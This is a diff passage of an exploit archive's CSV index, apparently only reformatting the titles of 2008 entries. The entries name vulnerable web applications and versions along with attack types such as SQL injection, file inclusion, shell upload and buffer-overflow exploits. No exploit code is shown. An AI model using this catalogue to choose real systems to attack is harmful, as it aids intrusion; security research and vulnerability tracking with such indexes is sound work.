-5892,platforms/php/webapps/5892.txt,"phpAuction 3.2.1 (item.php id) Remote SQL Injection",2008-06-21,"Hussin X",php,webapps,0 +5892,platforms/php/webapps/5892.txt,"phpAuction 3.2.1 - (item.php id) Remote SQL Injection",2008-06-21,"Hussin X",php,webapps,0 5893,platforms/php/webapps/5893.txt,"Joomla Component EXP Shop (catid) SQL Injection",2008-06-22,His0k4,php,webapps,0 -5894,platforms/asp/webapps/5894.txt,"DUdForum 3.0 (forum.asp iFor) Remote SQL Injection",2008-06-22,Bl@ckbe@rD,asp,webapps,0 +5894,platforms/asp/webapps/5894.txt,"DUdForum 3.0 - (forum.asp iFor) Remote SQL Injection",2008-06-22,Bl@ckbe@rD,asp,webapps,0 5895,platforms/php/webapps/5895.txt,"shibby shop <= 2.2 - (SQL/update) Multiple Vulnerabilities",2008-06-22,KnocKout,php,webapps,0 5896,platforms/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-22,"CWH Underground",php,webapps,0 5897,platforms/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusion Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 -5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 (reverse shell) Blind SQL Injection Exploit",2008-06-22,"Guido Landi",php,webapps,0 +5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 - (reverse shell) Blind SQL Injection Exploit",2008-06-22,"Guido Landi",php,webapps,0 5899,platforms/php/webapps/5899.txt,"PageSquid CMS (index.php page) 0.3 Beta - Remote SQL Injection",2008-06-22,"CWH Underground",php,webapps,0 5900,platforms/php/webapps/5900.txt,"RSS-Aggregator (display.php path) Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps,0 5901,platforms/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusion Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 -5902,platforms/php/webapps/5902.txt,"HoMaP-CMS 0.1 (plugin_admin.php) Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 +5902,platforms/php/webapps/5902.txt,"HoMaP-CMS 0.1 - (plugin_admin.php) Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5903,platforms/php/webapps/5903.txt,"HomePH Design 2.10 RC2 - (RFI/LFI/XSS) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 -5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 (header.php) Local File Inclusion",2008-06-22,CraCkEr,php,webapps,0 +5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 - (header.php) Local File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - (LFI/XSS) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 5906,platforms/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 -5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 (index.php go) Remote SQL Injection",2008-06-23,SxCx,php,webapps,0 +5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 - (index.php go) Remote SQL Injection",2008-06-23,SxCx,php,webapps,0 5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 - Remote Privilege Escalation Exploit",2008-06-23,Cod3rZ,php,webapps,0 5910,platforms/php/webapps/5910.txt,"Ready2Edit (pages.php menuid) Remote SQL Injection",2008-06-23,Mr.SQL,php,webapps,0 -5911,platforms/php/webapps/5911.txt,"ResearchGuide 0.5 (guide.php id) SQL Injection",2008-06-23,dun,php,webapps,0 -5912,platforms/asp/webapps/5912.txt,"MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection",2008-06-23,Bl@ckbe@rD,asp,webapps,0 +5911,platforms/php/webapps/5911.txt,"ResearchGuide 0.5 - (guide.php id) SQL Injection",2008-06-23,dun,php,webapps,0 +5912,platforms/asp/webapps/5912.txt,"MVC-Web CMS 1.0/1.2 - (index.asp newsid) SQL Injection",2008-06-23,Bl@ckbe@rD,asp,webapps,0 5913,platforms/php/webapps/5913.txt,"MyBlog: PHP and MySQL Blog/CMS software (SQL/XSS) Vulnerabilities",2008-06-23,"CWH Underground",php,webapps,0 5914,platforms/php/webapps/5914.txt,"Demo4 CMS (index.php id) Remote SQL Injection",2008-06-23,"CWH Underground",php,webapps,0 5915,platforms/php/webapps/5915.txt,"Joomla Component com_facileforms 1.4.4 - RFI",2008-06-23,Kacak,php,webapps,0 -5916,platforms/php/webapps/5916.txt,"Dagger CMS 2008 (dir_inc) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 +5916,platforms/php/webapps/5916.txt,"Dagger CMS 2008 - (dir_inc) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 5917,platforms/php/webapps/5917.txt,"tinx CMS 1.1 - (LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5918,platforms/windows/dos/5918.pl,"uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit",2008-06-23,Exodus,windows,dos,0 5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - (LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 - (RFI/LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 -5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 (mod_root) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 +5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 - (mod_root) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems <= 3.0 - (listing_id) SQL Injection",2008-06-24,K-159,php,webapps,0 5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple Remote SQL Injection Vulnerabilities",2008-06-24,"CWH Underground",php,webapps,0 5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (firmware 1.00.9) Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0 -5927,platforms/asp/webapps/5927.txt,"DUcalendar 1.0 (detail.asp iEve) Remote SQL Injection",2008-06-24,Bl@ckbe@rD,asp,webapps,0 +5927,platforms/asp/webapps/5927.txt,"DUcalendar 1.0 - (detail.asp iEve) Remote SQL Injection",2008-06-24,Bl@ckbe@rD,asp,webapps,0 5928,platforms/php/webapps/5928.txt,"HiveMaker Directory (index.php cid) SQL Injection",2008-06-24,"security fears team",php,webapps,0 -5929,platforms/php/webapps/5929.txt,"E-topbiz ViralDX 2.07 (adclick.php bannerid) SQL Injection",2008-06-24,"Hussin X",php,webapps,0 -5930,platforms/php/webapps/5930.txt,"Link ADS 1 (out.php linkid) Remote SQL Injection",2008-06-24,"Hussin X",php,webapps,0 +5929,platforms/php/webapps/5929.txt,"E-topbiz ViralDX 2.07 - (adclick.php bannerid) SQL Injection",2008-06-24,"Hussin X",php,webapps,0 +5930,platforms/php/webapps/5930.txt,"Link ADS 1 - (out.php linkid) Remote SQL Injection",2008-06-24,"Hussin X",php,webapps,0 5931,platforms/php/webapps/5931.pl,"TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit",2008-06-24,k1tk4t,php,webapps,0 -5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 (index.php hal) Remote SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 -5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 (index.php zone) Local File Inclusion",2008-06-25,StAkeR,php,webapps,0 +5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - (index.php hal) Remote SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 +5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - (index.php zone) Local File Inclusion",2008-06-25,StAkeR,php,webapps,0 5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script (sb_jokeid) SQL Injection",2008-06-25,"Hussin X",php,webapps,0 5935,platforms/php/webapps/5935.pl,"Mambo Component Articles (artid) Blind SQL Injection Exploit",2008-06-25,"Ded MustD!e",php,webapps,0 5936,platforms/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Remote Arbitrary File Upload",2008-06-25,"CWH Underground",php,webapps,0 -5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 (page.php pid) Remote SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 -5938,platforms/php/webapps/5938.php,"PHPmotion <= 2.0 (update_profile.php) Remote Shell Upload Exploit",2008-06-25,EgiX,php,webapps,0 +5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) Remote SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 +5938,platforms/php/webapps/5938.php,"PHPmotion <= 2.0 - (update_profile.php) Remote Shell Upload Exploit",2008-06-25,EgiX,php,webapps,0 5939,platforms/php/webapps/5939.txt,"Joomla Component netinvoice 1.2.0 SP1 SQL Injection",2008-06-25,His0k4,php,webapps,0 5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0 5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 - (SQL/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 -5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection",2008-06-26,boom3rang,php,webapps,0 +5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 - (category) SQL Injection",2008-06-26,boom3rang,php,webapps,0 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 - (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0 -5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 (riddleid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 -5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 (tipid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 -5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 (jokeid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 -5949,platforms/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 (drinkid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 -5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 (itemid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 +5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 - (riddleid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 +5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - (tipid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 +5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 - (jokeid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 +5949,platforms/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 - (drinkid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 +5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 - (itemid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 5951,platforms/windows/local/5951.c,"XnView 1.93.6 - '.taac' Local Buffer Overflow Exploit PoC",2008-06-26,Shinnok,windows,local,0 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0 -5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0 +5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0 5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0 5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0 5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0 -5960,platforms/php/webapps/5960.txt,"SePortal 2.4 (poll.php poll_id) Remote SQL Injection",2008-06-27,Mr.SQL,php,webapps,0 +5960,platforms/php/webapps/5960.txt,"SePortal 2.4 - (poll.php poll_id) Remote SQL Injection",2008-06-27,Mr.SQL,php,webapps,0 5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod classifieds (lid) Remote SQL Injection",2008-06-27,boom3rang,php,webapps,0 5962,platforms/php/webapps/5962.txt,"poweraward 1.1.0 rc1 - (LFI/XSS) Multiple Vulnerabilities",2008-06-28,CraCkEr,php,webapps,0 5963,platforms/php/webapps/5963.txt,"Joomla Component jabode (id) Remote SQL Injection",2008-06-28,His0k4,php,webapps,0 -5964,platforms/php/webapps/5964.txt,"Online Booking Manager 2.2 (id) SQL Injection",2008-06-28,"Hussin X",php,webapps,0 +5964,platforms/php/webapps/5964.txt,"Online Booking Manager 2.2 - (id) SQL Injection",2008-06-28,"Hussin X",php,webapps,0 5965,platforms/php/webapps/5965.txt,"Joomla Component beamospetition Remote SQL Injection",2008-06-28,His0k4,php,webapps,0 5966,platforms/php/webapps/5966.pl,"Joomla Component Xe webtv (id) Blind SQL Injection Exploit",2008-06-28,His0k4,php,webapps,0 5967,platforms/php/webapps/5967.txt,"SebracCMS <= 0.4 - Multiple SQL Injection Vulnerabilities",2008-06-28,shinmai,php,webapps,0 5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS",2008-06-30,"Travis Warren",windows,dos,0 -5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 (pow) Remote SQL Injection",2008-06-30,anonymous,php,webapps,0 -5970,platforms/php/webapps/5970.txt,"eSHOP100 (SUB) Remote SQL Injection",2008-06-30,JuDge,php,webapps,0 +5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - (pow) Remote SQL Injection",2008-06-30,anonymous,php,webapps,0 +5970,platforms/php/webapps/5970.txt,"eSHOP100 - (SUB) Remote SQL Injection",2008-06-30,JuDge,php,webapps,0 5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin Exploit",2008-06-30,"CWH Underground",php,webapps,0 5972,platforms/php/webapps/5972.txt,"RCM Revision Web Development (products.php) SQL Injection",2008-06-30,Niiub,php,webapps,0 5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 Dreamwind load_template() Credentials Disclosure Exploit",2008-06-30,Nine:Situations:Group,php,webapps,0 @@ -5598,17 +5598,17 @@ id,file,description,date,author,platform,type,port 5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - (chatbox.php) Remote SQL Injection",2008-06-30,DNX,php,webapps,0 5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - Local Root Exploit (vga)",2008-07-01,"lul-disclosure inc.",openbsd,local,0 5980,platforms/php/webapps/5980.txt,"Mambo Component n-gallery Multiple SQL Injection Vulnerabilities",2008-06-30,AlbaniaN-[H],php,webapps,0 -5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0 -5982,platforms/php/webapps/5982.txt,"php-Agenda 2.2.4 (index.php page) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 -5983,platforms/php/webapps/5983.txt,"CAT2 (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 +5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0 +5982,platforms/php/webapps/5982.txt,"php-Agenda 2.2.4 - (index.php page) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 +5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 5984,platforms/php/webapps/5984.txt,"Sisplet CMS (index.php id) 2008-01-24 - Remote SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 -5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 (article_ID) Remote SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 +5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) Remote SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium <= 7.6.b.5 - Remote Code Execution Exploit",2008-07-01,"Charles Fol",php,webapps,0 -5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 (cat_id) Remote SQL Injection",2008-07-01,Kacak,php,webapps,0 -5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 (adid) Remote SQL Injection",2008-07-01,"Hussin X",php,webapps,0 -5989,platforms/php/webapps/5989.txt,"Joomla Component versioning 1.0.2 (id) SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0 +5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - (cat_id) Remote SQL Injection",2008-07-01,Kacak,php,webapps,0 +5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 - (adid) Remote SQL Injection",2008-07-01,"Hussin X",php,webapps,0 +5989,platforms/php/webapps/5989.txt,"Joomla Component versioning 1.0.2 - (id) SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0 5990,platforms/php/webapps/5990.txt,"Joomla Component mygallery (cid) Remote SQL Injection",2008-07-01,Houssamix,php,webapps,0 -5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 (boardID) Remote SQL Injection",2008-07-02,haZl0oh,php,webapps,0 +5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 - (boardID) Remote SQL Injection",2008-07-02,haZl0oh,php,webapps,0 5992,platforms/php/webapps/5992.txt,"CMS little (index.php template) 0.0.1 - Local File Inclusion",2008-07-02,"CWH Underground",php,webapps,0 5993,platforms/php/webapps/5993.txt,"Joomla Component com_brightweblinks (catid) SQL Injection",2008-07-02,His0k4,php,webapps,0 5994,platforms/php/webapps/5994.pl,"Joomla Component QuickTime VR 0.1 - Remote SQL Injection Exploit",2008-07-02,Houssamix,php,webapps,0 @@ -5627,9 +5627,9 @@ id,file,description,date,author,platform,type,port 6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (LFI/XSS) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0 6008,platforms/php/webapps/6008.php,"ImperialBB <= 2.3.5 - Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0 6009,platforms/php/webapps/6009.pl,"fuzzylime CMS 3.01 - Remote Command Execution Exploit",2008-07-05,Ams,php,webapps,0 -6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 (uid) Remote SQL Injection",2008-07-06,"HIva Team",php,webapps,0 +6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - (uid) Remote SQL Injection",2008-07-06,"HIva Team",php,webapps,0 6011,platforms/php/webapps/6011.txt,"contentnow 1.4.1 - (upload/XSS) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 -6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 (CMailCOM.dll) Remote SEH Overwrite Exploit",2008-07-06,Nine:Situations:Group,windows,remote,80 +6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - (CMailCOM.dll) Remote SEH Overwrite Exploit",2008-07-06,Nine:Situations:Group,windows,remote,80 6013,platforms/osx/remote/6013.pl,"Safari + Quicktime <= 7.3 RTSP Content-Type Remote BoF Exploit",2008-07-06,krafty,osx,remote,0 6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - (idDirectory) Blind SQL Injection",2008-07-07,Hamtaro,php,webapps,0 6015,platforms/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",php,webapps,0 @@ -5644,22 +5644,22 @@ id,file,description,date,author,platform,type,port 6025,platforms/php/webapps/6025.txt,"Joomla Component com_content 1.0.0 - (ItemID) SQL Injection",2008-07-08,unknown_styler,php,webapps,0 6026,platforms/linux/remote/6026.pl,"trixbox - (langChoice) Local File Inclusion Exploit (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script <= 4.0 - Remote SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 -6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 (sIncPath) Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 +6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - (sIncPath) Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6029,platforms/multiple/dos/6029.txt,"Firefox/Evince/EOG/Gimp - (.SVG) Denial of Service PoC",2008-07-08,"Kristian Hermansen",multiple,dos,0 6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - (m3u) Local BoF Exploit (0Day)",2008-07-08,h07,windows,local,0 6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) BoF PoC",2008-07-08,Defsanguje,windows,local,0 6032,platforms/linux/local/6032.py,"Poppler <= 0.8.4 libpoppler uninitialized pointer Code Execution PoC",2008-07-08,"Felipe Andres Manzano",linux,local,0 -6033,platforms/php/webapps/6033.pl,"AuraCMS <= 2.2.2 (pages_data.php) Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 +6033,platforms/php/webapps/6033.pl,"AuraCMS <= 2.2.2 - (pages_data.php) Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 6034,platforms/php/webapps/6034.txt,"Dreampics Builder (page) Remote SQL Injection",2008-07-09,"Hussin X",php,webapps,0 6035,platforms/php/webapps/6035.txt,"DreamNews Manager (id) Remote SQL Injection",2008-07-10,"Hussin X",php,webapps,0 -6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 (dirDepth) Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0 +6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - (dirDepth) Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0 6037,platforms/php/webapps/6037.txt,"phpDatingClub (website.php page) Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0 6039,platforms/windows/local/6039.c,"Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit",2008-07-11,Shinnok,windows,local,0 6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injection Vulnerabilities",2008-07-11,"Nu Am Bani",php,webapps,0 6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps,0 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - (LFI/XSS/PHPInfo) Remote Vulnerabilities",2008-10-20,StAkeR,php,webapps,0 6043,platforms/osx/dos/6043.rb,"Core Image Fun House <= 2.0 - Arbitrary Code Execution PoC (OSX)",2008-07-11,"Adriel T. Desautels",osx,dos,0 -6044,platforms/php/webapps/6044.txt,"Million Pixels 3 (id_cat) Remote SQL Injection",2008-07-11,"Hussin X",php,webapps,0 +6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - (id_cat) Remote SQL Injection",2008-07-11,"Hussin X",php,webapps,0 6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python)",2008-07-12,muts,linux,remote,80 6046,platforms/multiple/dos/6046.txt,"reSIProcate 1.3.2 - Remote Denial of Service PoC",2008-07-12,"Mu Security",multiple,dos,0 6047,platforms/php/webapps/6047.txt,"Maian Cart 1.1 Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 @@ -5667,34 +5667,34 @@ id,file,description,date,author,platform,type,port 6049,platforms/php/webapps/6049.txt,"Maian Gallery 2.0 Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6050,platforms/php/webapps/6050.txt,"Maian Greetings 2.1 Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6051,platforms/php/webapps/6051.txt,"Maian Music 1.0 Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 -6053,platforms/php/webapps/6053.php,"fuzzylime CMS 3.01 (polladd.php poll) Remote Code Execution Exploit (PHP)",2008-07-12,"Inphex and real",php,webapps,0 +6053,platforms/php/webapps/6053.php,"fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution Exploit (PHP)",2008-07-12,"Inphex and real",php,webapps,0 6054,platforms/php/webapps/6054.pl,"fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution Exploit (Perl)",2008-07-12,"Inphex and real",php,webapps,0 6055,platforms/php/webapps/6055.pl,"Joomla Component n-forms 1.01 - Blind SQL Injection Exploit",2008-07-12,"The Moorish",php,webapps,0 6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition (id) Remote SQL Injection",2008-07-12,Mr.SQL,php,webapps,0 6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe - (SQL/LFI) Multiple Vulnerabilities",2008-07-12,S.W.A.T.,php,webapps,0 6058,platforms/php/webapps/6058.txt,"Avlc Forum (vlc_forum.php id) - Remote SQL Injection",2008-07-12,"CWH Underground",php,webapps,0 6059,platforms/windows/dos/6059.pl,"Simple DNS Plus <= 5.0/4.1 - Remote Denial of Service Exploit",2008-07-13,Exodus,windows,dos,0 -6060,platforms/php/webapps/6060.php,"fuzzylime CMS 3.01 (commrss.php) Remote Code Execution Exploit",2008-07-13,"Charles Fol",php,webapps,0 +6060,platforms/php/webapps/6060.php,"fuzzylime CMS 3.01 - (commrss.php) Remote Code Execution Exploit",2008-07-13,"Charles Fol",php,webapps,0 6061,platforms/php/webapps/6061.txt,"Maian Guestbook <= 3.2 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6062,platforms/php/webapps/6062.txt,"Maian Links <= 3.1 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6063,platforms/php/webapps/6063.txt,"Maian Recipe <= 1.2 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6064,platforms/php/webapps/6064.txt,"Maian Weblog <= 4.0 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6065,platforms/php/webapps/6065.txt,"Maian Uploader <= 4.0 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6066,platforms/php/webapps/6066.txt,"Maian Search <= 1.1 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6067,platforms/php/webapps/6067.pl,"Ultrastats <= 0.2.142 (players-detail.php) Blind SQL Injection Exploit",2008-07-13,DNX,php,webapps,0 +6067,platforms/php/webapps/6067.pl,"Ultrastats <= 0.2.142 - (players-detail.php) Blind SQL Injection Exploit",2008-07-13,DNX,php,webapps,0 6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a Arbitrary Add-Admin",2008-07-13,"CWH Underground",php,webapps,0 6069,platforms/php/webapps/6069.txt,"itechbids 7.0 gold - (XSS/SQL) Multiple Vulnerabilities",2008-07-13,"Encrypt3d.M!nd ",php,webapps,0 -6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0 +6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - (cookie) Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0 6071,platforms/php/webapps/6071.txt,"CodeDB (list.php lang) Local File Inclusion",2008-07-14,cOndemned,php,webapps,0 6072,platforms/windows/dos/6072.html,"Yahoo Messenger 8.1 - ActiveX Remote Denial of Service Exploit",2008-07-14,"Jeremy Brown",windows,dos,0 6073,platforms/php/webapps/6073.txt,"bilboblog 2.1 - Multiple Vulnerabilities",2008-07-14,BlackH,php,webapps,0 -6074,platforms/php/webapps/6074.txt,"Pluck 4.5.1 (blogpost) Local File Inclusion (win only)",2008-07-14,BugReport.IR,php,webapps,0 +6074,platforms/php/webapps/6074.txt,"Pluck 4.5.1 - (blogpost) Local File Inclusion (win only)",2008-07-14,BugReport.IR,php,webapps,0 6075,platforms/php/webapps/6075.txt,"Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection",2008-07-15,StAkeR,php,webapps,0 6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File 